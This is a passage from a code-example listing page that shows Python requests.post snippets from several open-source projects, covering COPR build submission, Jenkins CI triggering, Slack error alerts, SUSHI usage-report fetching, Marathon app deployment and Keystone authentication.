            logger.fatal('CTRL-C pressed')

        except Exception as failure:

            logger.fatal('unexpected condition -> %s' % diagnostic(failure))

Example 45

Project: dgroc Source File: dgroc.py
Function: copr_build
def copr_build(config, srpms):
    ''' Using the information provided in the configuration file,
    run the build in copr.
    '''

    # dgroc config check
    if config.has_option('main', 'upload_command') and \
            not config.has_option('main', 'upload_url'):
        raise DgrocException(
            'No `upload_url` specified in the `main` section of the dgroc '
            'configuration file.')

    if not config.has_option('main', 'copr_url'):
        warnings.warn(
            'No `copr_url` option set in the `main` section of the dgroc '
            'configuration file, using default: %s' % COPR_URL)
        copr_url = COPR_URL
    else:
        copr_url = config.get('main', 'copr_url')

    copr_url = copr_url.rstrip('/')

    insecure = False
    if config.has_option('main', 'no_ssl_check') \
            and config.get('main', 'no_ssl_check'):
        warnings.warn(
            "Option `no_ssl_check` was set to True, we won't check the ssl "
            "certificate when submitting the builds to copr")
        insecure = config.get('main', 'no_ssl_check')

    username, login, token = _get_copr_auth()

    build_ids = []
    # Build project/srpm in copr
    for project in srpms:
        if config.has_option(project, 'copr'):
            copr = config.get(project, 'copr')
        else:
            copr = project

        project_id = get_project_id(copr_url, username, copr)

        metadata = {
            'project_id': project_id,
            'chroots': get_chroots(copr_url, project_id),
        }
        url = '%s/api_2/builds' % (copr_url)
        srpm_name = os.path.basename(srpms[project])

        if config.has_option('main', 'upload_command'):
            # SRPMs are uploaded to remote location.
            srpm_file = config.get('main', 'upload_url') % srpm_name

            metadata['srpm_url'] = srpm_file
            req = requests.post(
                url, auth=(login, token), json=metadata, verify=not insecure)
        else:
            # Directly upload SRPM to COPR
            files = {
                'srpm': (srpm_name, open(srpms[project], 'rb'),
                         'application/x-rpm'),
                'metadata': ('', json.dumps(metadata)),
            }
            req = requests.post(
                url, auth=(login, token), files=files, verify=not insecure)

        if req.status_code != requests.codes.created:
            LOG.error('Failed to start build in COPR')
            LOG.error('Status code was %d: %s', req.status_code, req.reason)
            try:
                LOG.error(req.json()['message'])
            except ValueError:
                LOG.error(req.text)

        build_url = req.headers['Location']
        build_id = build_url.split('/')[-1]
        build_ids.append(build_id)

    return build_ids

Example 46

Project: pagure Source File: pagure_ci_server.py
@trollius.coroutine
def handle_messages():
    ''' Handles connecting to redis and acting upon messages received.
    In this case, it means triggering a build on jenkins based on the
    information provided.
    '''

    host = pagure.APP.config.get('REDIS_HOST', '0.0.0.0')
    port = pagure.APP.config.get('REDIS_PORT', 6379)
    dbname = pagure.APP.config.get('REDIS_DB', 0)
    connection = yield trollius.From(trollius_redis.Connection.create(
        host=host, port=port, db=dbname))

    # Create subscriber.
    subscriber = yield trollius.From(connection.start_subscribe())

    # Subscribe to channel.
    yield trollius.From(subscriber.subscribe(['pagure.ci']))

    # Inside a while loop, wait for incoming events.
    while True:
        reply = yield trollius.From(subscriber.next_published())
        LOG.info(
            'Received: %s on channel: %s',
            repr(reply.value), reply.channel)
        data = json.loads(reply.value)

        pr_id = data['pr']['id']
        pr_uid = data['pr']['uid']
        branch = data['pr']['branch_from']
        LOG.info('Looking for PR: %s', pr_uid)
        request = pagure.lib.get_request_by_uid(pagure.SESSION, pr_uid)

        if not request:
            LOG.warning(
                'No request could be found from the message %s', data)
            continue

        LOG.info(
            "Trigger on %s PR #%s from %s: %s",
            request.project.fullname, pr_id,
            request.project_from.fullname, branch)

        url = request.project.ci_hook.ci_url.rstrip('/')

        if data['ci_type'] == 'jenkins':
            url = url + '/buildWithParameters'
            repo = '%s/%s' % (
                pagure.APP.config['GIT_URL_GIT'].rstrip('/'),
                request.project_from.path)
            LOG.info(
                'Triggering the build at: %s, for repo: %s', url, repo)
            requests.post(
                url,
                data={
                    'token': request.project.ci_hook.pagure_ci_token,
                    'cause': pr_id,
                    'REPO': repo,
                    'BRANCH': branch
                }
            )
        else:
            LOG.warning('Un-supported CI type')

        LOG.info('Ready for another')

Example 47

Project: logtacts Source File: send_contact_reminders.py
    def handle(self, *args, **options):
        logger.debug("Starting contact reminder sending")
        last_month = timezone.now() - timedelta(weeks=4)
        profiles_opted_in = Profile.objects.filter(send_contact_reminders=True)
        for profile in profiles_opted_in:
            logger.debug("Starting compilation for {}".format(profile.user))
            contact = Contact.objects.get_contacts_for_user(
                profile.user
            ).filter(
                Q(last_contact__lte=last_month) | Q(last_contact=None),
                should_surface=True,
            ).order_by('?')[0]
            subject = '[Contact Otter] Contact reminder'
            context = {
                'contact': contact,
                'domain': Site.objects.get_current().domain,

            }
            txt = get_template('email/contact_reminder.txt').render(context)
            html = get_template('email/contact_reminder.html').render(context)
            message = EmailMultiAlternatives(
                subject=subject,
                body=txt,
                from_email="ContactOtter <[email protected]>",
                to=[profile.user.email],
            )
            message.attach_alternative(html, "text/html")
            try:
                logger.debug("Trying to send message to {} about {}".format(
                    profile.user, contact
                ))
                message.send()
                logger.debug("Sent message to {} successfuly".format(profile.user))
            except:
                logger.exception('Problem sending reminder for %s' % (profile))
                try:
                    if not settings.DEBUG:
                        payload = {
                            'text': 'Error in contactotter reminder: {}'.format(profile)
                        }
                        r = requests.post(
                            settings.SLACK_WEBHOOK_URL,
                            data=json.dumps(payload),
                        )
                except:
                    logger.exception("Error sending error to slack")

        profiles_opted_in = Profile.objects.filter(send_birthday_reminders=True)
        for profile in profiles_opted_in:
            birthdays = ContactField.objects.filter(
                Q(label='Birthday') | Q(label='birthday') | Q(label='BIRTHDAY'),
                kind=contact_constants.FIELD_TYPE_DATE,
                value=timezone.now().strftime("%Y-%m-%d")
            )
            contacts = None
            if birthdays:
                contacts = [birthday.contact for birthday in birthdays]
            if contacts:
                context = {
                    'contacts': contacts,
                    'domain': Site.objects.get_current().domain,
                }
                subject="[ContactOtter] Birthday reminder"
                txt = get_template('email/birthday_reminder.txt').render(context)
                html = get_template('email/birthday_reminder.html').render(context)
                message = EmailMultiAlternatives(
                    subject=subject,
                    body=txt,
                    from_email='ContactOtter <[email protected]>',
                    to=[profile.user.email],
                )
                message.attach_alternative(html, "text/html")
                try:
                    logger.debug("Trying to send message to {} about {}".format(
                        profile.user, contact
                    ))
                    message.send()
                    logger.debug("Sent message to {} successfuly".format(profile.user))
                except:
                    logger.exception('Problem sending reminder for %s' % (profile))
                    try:
                        if not settings.DEBUG:
                            payload = {
                                'text': 'Error in logtacts reminder: {}'.format(profile)
                            }
                            r = requests.post(
                                settings.SLACK_WEBHOOK_URL,
                                data=json.dumps(payload),
                            )
                    except:
                        logger.exception("Error sending error to slack")

Example 48

Project: pycounter Source File: sushi.py
def get_sushi_stats_raw(wsdl_url, start_date, end_date, requestor_id=None,
                        requestor_email=None, requestor_name=None,
                        customer_reference=None, customer_name=None,
                        report="JR1", release=4, sushi_dump=False):
    """Get SUSHI stats for a given site in raw XML format.

    :param wsdl_url: URL to SOAP WSDL for this provider

    :param start_date: start date for report (must be first day of a month)

    :param end_date: end date for report (must be last day of a month)

    :param requestor_id: requestor ID as defined by SUSHI protocol

    :param requestor_email: requestor email address, if required by provider

    :param requestor_name: Internationally recognized organization name

    :param customer_reference: customer reference number as defined by SUSHI
        protocol

    :param customer_name: Internationally recognized organization name

    :param report: report type, values defined by SUSHI protocol

    :param release: report release number (should generally be `4`.)

    :param sushi_dump: produces dump of XML to DEBUG logger

    """
    root = etree.Element("{%(SOAP-ENV)s}Envelope" % NS, nsmap=NS)
    body = etree.SubElement(root, "{%(SOAP-ENV)s}Body" % NS)
    timestamp = arrow.utcnow().isoformat()
    rr = etree.SubElement(body, "{%(sushicounter)s}ReportRequest" % NS,
                          {
                              'Created': timestamp,
                              'ID': str(uuid.uuid4())
                          })

    req = etree.SubElement(rr, "{%(sushi)s}Requestor" % NS)
    rid = etree.SubElement(req, "{%(sushi)s}ID" % NS)
    rid.text = requestor_id
    req_name_element = etree.SubElement(req, "{%(sushi)s}Name" % NS)
    req_name_element.text = requestor_name
    req_email_element = etree.SubElement(req, "{%(sushi)s}Email" % NS)
    req_email_element.text = requestor_email

    cust_ref_elem = etree.SubElement(rr, "{%(sushi)s}CustomerReference" % NS)
    cid = etree.SubElement(cust_ref_elem, "{%(sushi)s}ID" % NS)
    cid.text = customer_reference
    cust_name_elem = etree.SubElement(cust_ref_elem, "{%(sushi)s}Name" % NS)
    cust_name_elem.text = customer_name

    report_def_elem = etree.SubElement(rr, "{%(sushi)s}ReportDefinition" % NS,
                                       Name=report, Release=str(release))
    filters = etree.SubElement(report_def_elem, "{%(sushi)s}Filters" % NS)
    udr = etree.SubElement(filters, "{%(sushi)s}UsageDateRange" % NS)
    beg = etree.SubElement(udr, "{%(sushi)s}Begin" % NS)
    beg.text = start_date.strftime("%Y-%m-%d")
    end = etree.SubElement(udr, "{%(sushi)s}End" % NS)
    end.text = end_date.strftime("%Y-%m-%d")

    payload = etree.tostring(root, pretty_print=True,
                             xml_declaration=True, encoding="utf-8")

    headers = {"SOAPAction": '"SushiService:GetReportIn"',
               "Content-Type": "text/xml; charset=UTF-8",
               "User-Agent": "pycounter/%s" % pycounter.__version__,
               "Content-Length": str(len(payload))}

    response = requests.post(url=wsdl_url,
                             headers=headers,
                             data=payload,
                             verify=False)

    if sushi_dump:
        logger.debug("SUSHI DUMP: request: %s \n\n response: %s",
                     payload,
                     response.content)
    return response.content

Example 49

Project: ochothon Source File: deploy.py
    def run(self):
        try:

            #
            # - we need to pass the framework master IPs around (ugly)
            #
            assert 'MARATHON_MASTER' in os.environ, '$MARATHON_MASTER not specified (check your portal pod)'
            master = choice(os.environ['MARATHON_MASTER'].split(','))
            headers = \
                {
                    'content-type': 'application/json',
                    'accept': 'application/json'
                }

            with open(self.template, 'r') as f:

                #
                # - parse the template yaml file (e.g container definition)
                #
                raw = yaml.load(f)
                assert raw, 'empty YAML input (user error ?)'

                #
                # - merge with our defaults
                # - we want at least the cluster & image settings
                # - TCP 8080 is added by default to the port list
                #
                defaults = \
                    {
                        'start': True,
                        'debug': False,
                        'settings': {},
                        'ports': [8080],
                        'verbatim': {}
                    }

                cfg = merge(defaults, raw)
                assert 'cluster' in cfg, 'cluster identifier undefined (user error ?)'
                assert 'image' in cfg, 'docker image undefined (user error ?)'

                #
                # - if a suffix is specified append it to the cluster identifier
                #
                if self.suffix:
                    cfg['cluster'] = '%s-%s' % (cfg['cluster'], self.suffix)

                #
                # - timestamp the application (we really want a new uniquely identified application)
                # - lookup the optional overrides and merge with our pod settings if specified
                # - this is what happens when the -o option is used
                #
                stamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d-%H-%M-%S')
                qualified = '%s.%s' % (self.namespace, cfg['cluster'])
                application = 'ochopod.%s-%s' % (qualified, stamp)
                if qualified in self.overrides:

                    blk = self.overrides[qualified]
                    logger.debug('%s : overriding %d settings (%s)' % (self.template, len(blk), qualified))
                    cfg['settings'] = merge(cfg['settings'], blk)

                def _nullcheck(cfg, prefix):

                    #
                    # - walk through the settings and flag any null value
                    #
                    missing = []
                    if cfg is not None:
                        for key, value in cfg.items():
                            if value is None:
                                missing += ['%s.%s' % ('.'.join(prefix), key)]
                            elif isinstance(value, dict):
                                missing += _nullcheck(value, prefix + [key])

                    return missing

                missing = _nullcheck(cfg['settings'], ['pod'])
                assert not missing, '%d setting(s) missing ->\n\t - %s' % (len(missing), '\n\t - '.join(missing))

                #
                # - if we still have no target default it to 1 single pod
                #
                if not self.pods:
                    self.pods = 1

                #
                # - setup our port list
                # - the port binding is specified either by an integer (container port -> dynamic mesos port), by
                #   two integers (container port -> host port) or by an integer followed by a * (container port ->
                #   same port on the host)
                # - on top of that, all those options allow to specify whether the protocol is TCP or UDP by adding
                #   the desired protocol after the binding (e.g. '8080 tcp' or '8125 * udp'. TCP is the default if no
                #   protocol is specified.
                # - the marathon pods must by design map /etc/mesos
                #
                def _parse_port(token):
                    
                    #
                    # - tries to return an int if possible, a string otherwise
                    #
                    def get_token_no_protocol(token):
                        # - remove the protocol piece
                        t = token[:-4].strip()
                        try:
                            return int(t)
                        except ValueError:
                            return t
                    
                    if isinstance(token, str) and token.lower().endswith(' udp'):
                        protocol = 'udp'
                        token_no_protocol = get_token_no_protocol(token)
                        
                    elif isinstance(token, str) and token.lower().endswith(' tcp'):
                        protocol = 'tcp'
                        token_no_protocol = get_token_no_protocol(token)
                    else:
                        # - TCP is the default
                        protocol = 'tcp'
                        token_no_protocol = token    
                    
                    if isinstance(token_no_protocol, int):
                        return {'containerPort': token_no_protocol, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str) and token_no_protocol.endswith(' *'):
                        port = int(token_no_protocol[:-2])
                        return {'containerPort': port, 'hostPort': port, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str):
                        ports = token_no_protocol.split(' ')
                        assert len(ports) == 2, 'invalid port syntax (must be two integers separated by 1+ spaces optionally followed by the protocol (tcp or udp, defaults to tcp))'
                        return {'containerPort': int(ports[0]), 'hostPort': int(ports[1]), 'protocol': protocol}
                    else:
                        assert 0, 'invalid port syntax ("%s")' % token

                #
                # - craft the docker image specifier
                # - if -r is used make sure to add (or override) the :<label> suffix
                #
                image = cfg['image']
                tokens = image.split(':')
                image = '%s:%s' % (tokens[0], self.release) if self.release else image

                #
                # - note the marathon-ec2 ochopod bindings will set the application hint automatically
                #   via environment variable (e.g no need to specify it here)
                # - make sure to mount /etc/mesos and /opt/mesosphere to account for various mesos installs
                #
                ports = [_parse_port(token) for token in cfg['ports']] if 'ports' in cfg else []
                spec = \
                    {
                        'id': application,
                        'instances': self.pods,
                        'env':
                            {
                                'ochopod_cluster': cfg['cluster'],
                                'ochopod_debug': str(cfg['debug']).lower(),
                                'ochopod_start': str(cfg['start']).lower(),
                                'ochopod_namespace': self.namespace,
                                'pod': json.dumps(cfg['settings'])
                            },
                        'container':
                            {
                                'type': 'DOCKER',
                                'docker':
                                    {
                                        'forcePullImage': True,
                                        'image': image,
                                        'network': 'BRIDGE',
                                        'portMappings': ports
                                    },
                                'volumes':
                                    [
                                        {
                                            'containerPath': '/etc/mesos',
                                            'hostPath': '/etc/mesos',
                                            'mode': 'RO'
                                        },
                                        {
                                            'containerPath': '/opt/mesosphere',
                                            'hostPath': '/opt/mesosphere',
                                            'mode': 'RO'
                                        }
                                    ]
                            }
                    }

                #
                # - if we have a 'verbatim' block in our image definition yaml, merge it now
                #
                if 'verbatim' in cfg:
                    spec = merge(cfg['verbatim'], spec)

                #
                # - pick a marathon master at random
                # - fire the POST /v2/apps to create our application
                # - this will indirectly spawn our pods
                #
                url = 'http://%s/v2/apps' % master
                reply = post(url, data=json.dumps(spec), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

                #
                # - wait for all the pods to be in the 'running' mode
                # - the 'application' hint is set by design to the marathon application identifier
                # - the sequence counters allocated to our new pods are returned as well
                #
                target = ['dead', 'running'] if self.strict else ['dead', 'stopped', 'running']
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, qualified, 'info')
                        return [(hints['process'], seq) for seq, hints, _ in replies.values()
                                if hints['application'] == application and hints['process'] in target]

                    js = run(self.proxy, _query)
                    assert len(js) == self.pods, 'not all pods running yet'
                    return js

                js = _spin()
                running = sum(1 for state, _ in js if state is not 'dead')
                up = [seq for _, seq in js]
                self.out['up'] = up
                self.out['ok'] = self.pods == running
                logger.debug('%s : %d/%d pods are running ' % (self.template, running, self.pods))

                if not up:

                    #
                    # - nothing is running (typically because the image has an issue and is not
                    #   not booting the ochopod script for instance, which happens often)
                    # - in that case fire a HTTP DELETE against the marathon application to clean it up
                    #
                    url = 'http://%s/v2/apps/%s' % (master, application)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))

Example 50

Project: posthaste Source File: posthaste.py
Function: authenticate
    def _authenticate(self, args=None):
        if not args:
            args = self._args
        auth_url = os.path.join(args.auth_url, 'tokens')

        if args.identity == 'rackspace':
            auth_data = {
                'auth': {
                    'RAX-KSKEY:apiKeyCredentials': {
                        'username': args.username,
                        'apiKey': args.password
                    }
                }
            }
        elif args.identity == 'keystone':
            auth_data = {
                'auth': {
                    'passwordCredentials': {
                        'username': args.username,
                        'password': args.password
                    }
                }
            }
        else:
            raise SystemExit('Unsupported identity/OS_AUTH_SYSTEM provided')

        headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }

        r = requests.post(auth_url, data=json.dumps(auth_data),
                          headers=headers)

        if r.status_code != 200:
            raise SystemExit(json.dumps(r.json(), indent=4))

        auth_response = r.json()
        token = auth_response['access']['token']['id']
        service_catalog = auth_response['access']['serviceCatalog']

        if args.internal:
            url_type = 'internalURL'
        else:
            url_type = 'publicURL'

        endpoint = None
        for service in service_catalog:
            if (service['type'] == 'object-store' and
                    service['name'] in ['cloudFiles', 'swift']):
                for ep in service['endpoints']:
                    if ep['region'] == args.region:
                        endpoint = ep[url_type]
                        break
                break
        if not endpoint:
            raise SystemExit('Endpoint not found')

        self.token = token
        self.endpoint = endpoint
See More Examples - Go to Next Page
Page 1 Selected Page 2 Page 3 Page 4